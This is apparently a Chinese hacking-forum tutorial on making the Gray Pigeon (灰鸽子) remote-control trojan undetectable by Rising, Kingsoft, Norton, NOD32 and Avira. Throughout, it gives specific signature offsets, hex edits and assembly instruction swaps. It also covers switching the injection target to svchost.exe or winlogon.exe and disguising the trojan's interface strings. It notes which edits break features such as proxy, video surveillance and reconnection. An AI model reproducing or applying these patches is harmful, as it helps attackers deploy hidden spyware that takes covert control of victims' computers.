黑防灰鸽子特征免杀

xy000000

给大家带一个黑防灰鸽子特征码关键几处影响到灰鸽子使用修改方法。。，下面的特征码主要是针对瑞星的，生成能过表明，内存，主动防御。。。
一.改插入进程
搜索关键字\Program Files\Internet Explorer\IEXPLORE.EXE  
修改成为  \Program Files\Outlook Express\msimn.exe.....
          \WINDOWS\system32\svchost.exe................
          \Windows\System32\Winlogon.exe
           IEXPLORE.EXE
           Winlogon.exe
另外一处IEXPLORE.EXE修改成为msimn.exe 否则不能上线
C:\Program Files\Outlook Express\msimn.exe------消息广播不能发送  这里修改 影响这个的  看我演示
看  没消息了。。。。
   不好意思
黑防专版 ----沉默远控  德才兼备
灰鸽子远程控**务端安装----书山有路勤为径学海无涯苦
系统芯片----我爱的心
物理内存---智脑内心


Windows版本----xiaojun型号
Windows目录----xiaojun路径
注册公司-----我的女人
注册用户---我的玫瑰------------------------主动特征码：0009F4E3_00000002
当前用户----现在的你
当前日期----现在日子
开机时间----恋爱时候
计算机名称---我的爱人是
窗口分辨率----女人好看否


              

剪切板内容为空或非文本信息---------学海无涯古作舟咋能没结果
打开文件失败-----无法显示爱情
无插件----没外遇
                                         -------------无法在任务管理器里面隐藏
56 00 43 00 32 00 35 00 50 00 4A 00 55 00 4C 00 30 00 VC259JUL03 （用0填充）


删除 DVCLAL

0x0005FCA2 u--U 55---75        
0x0005FE1A      BF F1           正在传送数据
0x0009F552 3A--3B                    机名称:---;
0x000A0B5B 09---FF  20--00----- if exit uninstal.bat 无法自动删除 360报告灰   鸽子变种残留（006）.此处修改会导致无法自动删除 uninstal.bat 文件
0x000B7C3E 65--45     72没找到
0x000B7E15 00-- FF
0x000B9097   000b96d0h:            -----上线加密

xy000000

金山
[特征] 000A0AF7_00000001  004A16F7 向后偏移两字节
[特征] 000A1257_00000001  004A1E57     改上面1E48的mov ecx,5    反映变慢                              
    重装了个另外版的瑞星，原来免费2008版本免杀的就被杀了  02---00 --05??
   
   
    -------------------------------------------------------------（1）
   
    [特征] 000A0DB8_00000001 26改27
    [特征] 0008B425_00000001  50 改为 51
     [特征] 000933FE_00000001 填充0
  [特征] 00094B3E_00000001 01改02    远程视频断开，无法使用   再看这一处吧。  按照网上的方法 会影响 视频监控的哦 。。看我改
  [特征] 000973EA_00000001 填充0
  
  [特征] 0009A8A3_00000001 13改14    停止代理的时候 没有反映 出错了。。。动不了
  [特征] 0009AD0D_00000001 38改37    代理无法正常运行
  [特征] 0009CBBC_00000001 DB 改为DE  代理无法正常运行
  
  
  
  [特征] 0009DC3E_00000001 07 改06  
  [特征] 0009EC44_00000001 填充0      无法使用代理功能。。。
  [特征] 0009F3F6_00000001 08改07    这处会导致系统信息无法正常显示
  [特征] 0009F5A7_00000001  75改76   
  
  
  000A14C3_00000001  4A改4B
[特征] 000B9A03_00000001 GrayPigeon 改 gRAYpIGEON  代理问题


0009B679_00000001     0049C279 16进制5A改为5C  
000A158A_00000001     004A218A  修改大小写 X---x
[特征] 00069416_00000001     0046A016  16进制46改为45  还有这些 都要影响代理运行的哦，我就不具体修改了
[特征] 000A1301_00000001     004A1F01  B7改为B6  无法运行
000A0AF7_00000001     004A16F7  修改大小写 P---p  无法生成正常文件

0005FDEB_00000001     004609EB  无效的缓冲区  虚拟内存过低

0009748D_00000001     0049808D  特征码上方,黑客动画吧00改变01
[特征] 000A0DB7_00000002这一处连续的数字可以加减.把26改成27 找不到。。。74
  
  [特征] 0009BBB7_00000002跳到这一处是字母.可以修改大小写 r--R
  
  起始偏移 000B9A4D 偏移大小 00000007  大小写反转000B9A4D_000B9A54
  
  -------------------------------------------------------------------------（2）
  
  [特征] 00006DE7_00000001 004079E7 mov  dword ptr [edx], eax      movsx  eax, word ptr [esp] 调换位置
  [特征] 0005FCA9_00000001  004608A9  xor 改为or 004608A9
  [特征] 0005FCB5_00000001   004608B5 TEST  ESI, ESI  改位 XOR  ESI, ESI
  [特征] 00091C26_00000001   00492826 POP ESI POP EDI 互换位置
  [特征] 00099481_00000001 0049A081 OR  EAX, 595AC033 改 XOR  EAX, 595AC033
  [特征] 0009A87A_00000001 0049B47A  push 0 改为push 6
  [特征] 000A0DD2_00000001  004A19D2  push -1 改位 psuh -2
  [特征] 000A12A2_00000001 004A1EA2  test  eax, eax test  bl, bl  test改or
  [特征] 000A12A8_00000001  同上--------------没该。。
  [特征] 0005FDFB_00000001 004609FB MOV  EDI, D4C4B5D5    MOV  DH, B3 调换位置 空的远程地址  远程地址为空---找不到  
  [特征] 0009AB3C_00000001 0049B73C call 0042CA70 互换位置 call 0042ca60 然后修改xor ecx ecx为or--------------------这处修改后，只能上线一次，客户端重新打开就不能上线了。。。。
  
      [特征] 000A0A46_00000001  004A1646 注意观察寄存器的变化。
      004A1644  6A 00    push  0
     004A1646  6A 00    push  0
     004A1648  6A 40    push  40
     004A21ED  00      db  00                                这一处没有修改
      004A164A  90      nop

      v004A164A |. 6A 00    push  0
      
      

00096F4A_00000001     00497B4A  JNZ修改为JZ
0009B9C3_00000001     0049C5C3  特征码上方JNZ改为JZ
000B9A4F_00000001     004C0E4F  特征码上方小循环处的SBB改为SUB


--------------------------只上线一次？？？？  (3)--------------------------------------------------------
--------------------
诺顿的：
0000ACEB_00000002        内存地址：0040B8EB  (由je改jng）

[特征] 000A12A1_00000002用OC转换下内在地址.004A1EA1 test---or   是XOR，不修改。

00A14F4_00000001     004A20F4 一处,两行代码换位.
          004A20F2       C605 647F4A00>MOV BYTE PTR DS:[4A7F64],2
           004A20F9       A1 FC584A00   MOV EAX,DWORD PTR DS:[4A58FC
                            mov byte ptr ds:[4A7F64],1
                            mov eax,dword ptr ds:[4A58FC]


00094B3E_00000001     0049573E 特征码处CMP改为SUB    可以的吧，，还免杀的呢 。。
000973EA_00000001     00497FEA 特征码NOP掉后空一格汇编
0009AB3C_00000001     0049B73C 特征码NOP掉后,空一格汇编 0049B73C             8519        test dword ptr ds:[ecx],ebx
   这处 不断弹处access violation at address 00403D7E in modele 'svchost.exe'.Read of address FF645754


0009CBBC_00000001     0049D7BC  特征及上面两行代码黑客动画吧NOP后空一格再黑客动画吧粘贴. E8 FB 9F F6 FF 8B D8 85 DB   
                                                   
0009F5A7_00000001     004A01A7 特征码NOP后空一格汇编. 004A1E49 5.<Modu>    8BEC        mov ebp,esp
000A0A46_00000001     004A1646
    004A1644       6A 00         PUSH 0
    004A1646       6A 00         PUSH 0
    004A1648       6A 40         PUSH 40
    004A164A       6A 00         PUSH 0
    004A164C       6A 00         PUSH 0
    004A164E       6A 00         PUSH 0
   改为
   004A1644   |.   50             PUSH EAX
   004A1645   |.   6A 00         PUSH 0
   004A1647   |.   6A 00         PUSH 0
   004A1649   |.   6A 40         PUSH 40
   004A164B   |.   6A 00         PUSH 0
   004A164D   |.   6A 00         PUSH 0
   004A164F   |.   50             PUSH EAX
000A0DBF_00000001     004A19BF
    004A19BC       50             PUSH EAX
    004A19BD       6A 00         PUSH 0
    004A19BF       6A 00         PUSH 0
    改为
   004A19BC   |.   6A 00         PUSH 0                                
  004A19BE   |.   6A 00         PUSH 0                                 
  004A19C0   |.   50             PUSH EAX


000A12A8_00000001     004A1EA8
  004A1EA7     /74 11         JE SHORT CServer.004A1EBA
  004A1EA9     |C605 647F4A00>MOV BYTE PTR DS:[4A7F64],0


  以上两行代码换位.
000A14C3_00000001     004A20C3  
68 BC 21 4A
68 BC 20 4A



[特征] 000A0933_00000001     004A1533
[特征] 000A0A00_00000001     004A1600
一二处修改方法一样,两处CALL地址换位.
004A152E   |.   E8 3921F6FF   CALL 0040366C
004A1533   |.   E8 9413F6FF   CALL 004028CC
----------------本地测试，关了客户端后，无法再次上线
Idle[PID=0],Idle
  -Tcp stata=Time_wait,local 10.9.228.86:8000 Remote 10.9.227.86:1050
  -state=time_wait,local 10.9.227.86:8000 remote 10.9.227.86:1049


-----------------------（4） 二次上线有点慢，功能基本都在---------------------
[特征]     0005FF3A_00000001     00460B3A  TEXT --XOR，JE-JLE
[特征] 0009A86D_00000002    0049B46D      OR--XOR
[特征] 0009C73F_00000002   0049D33F  jnz----jmp
[特征] 0009B963_00000002   0049C563  jnz----jmp
[特征] 0009B58A_00000002     0049C18A jnz----jmp
[特征] 0009AD0D_00000001    0049B90D  JE--jle
[特征] 0009B913_00000002   0049C513  jnz----jmp
[特征] 0005FDFB_00000001   
  004609FB    C4  二进制移到00
[特征] 0005F845_00000001   00460445  PUSH -1----PUSH -2
[特征] 0005FBE0_00000001   004607E0  Jnz---jb
[特征] 000317F5_00000002   004323F5  定位出错？CALL换行
1[特征] 00012B3F_00000002 0041373F  ADD改SUB
[特征] 0006D2D8_00000001  0046DED8  d--D
[特征] 000A15BF_00000001  004A21BF  00填充   5[特征] 000A15BE_00000002 字符替换法 学习(可以直接删除,0替换)
[特征] 00068BEE_00000002 修改字符串大小写法
[特征] 0009ADFE_00000001  w--W   （www)
[特征] 0009ADF7_00000002 直接修改特征码的十六进制法09----08
----------------------(5)------------------------------------------------------------------

  瑞星主动
  [特征] 0005FFB4_00000002
[特征] 0005FFCE_00000002
未知错误代号 ---未来世界探秘
正在查找错误信息----我的心在空中飞翔
修改内核内存数据：
\Device\PhysicalMemory

nod32
[特征] 00006434_00000001        00407034   jmp dword ptr ds:[4A83E4] NOP 下移  jmp 站四个字节
0000ACEB_00000002        内存地址：0040B8EB  (由je改jng）
小红伞
[特征] 000B27AC_00000001 上面
BBCANCEL
BBIGNORE 上下字符互换

    文件地址           内存地址     文件字符串         函数指针地址

7[特征] 000A6EFB_00000002 004AACFB    ShellExecuteA        输入表函数调整对应内存地址004A89A0，文件地址000A4BA0对应的指针EE----ED

8[特征] 000A6F2B_00000002 004AAD2B    InternetOpenUrlA     输入表函数调整000A4BAC

9[特征] 000A695F_00000002 004AA75F     FindWindowA       输入表函数调整000A4A60


-------------------------------------------------------------------
                                 

口点加一，不会瑞星全部查杀
特征码 物理地址/物理长度 如下:
[特征] 000317F5_00000001
[特征] 0009A67A_00000001------00填充
[特征] 0009B7D7_00000001
[特征] 0009B925_00000001
[特征] 0009CBE6_00000001
[特征] 0009E5AA_00000001
[特征] 0009EC44_00000001
[特征] 0009F3F6_00000001
[特征] 000B99B7_00000001----n---N


特征码分布示意图:
[--------------------------------------------------]
[-----------------M--------------------------------]
[--------------------------------------------------]
[--------------------------------------------------]
[--------MM-M-MM----------------------------------M]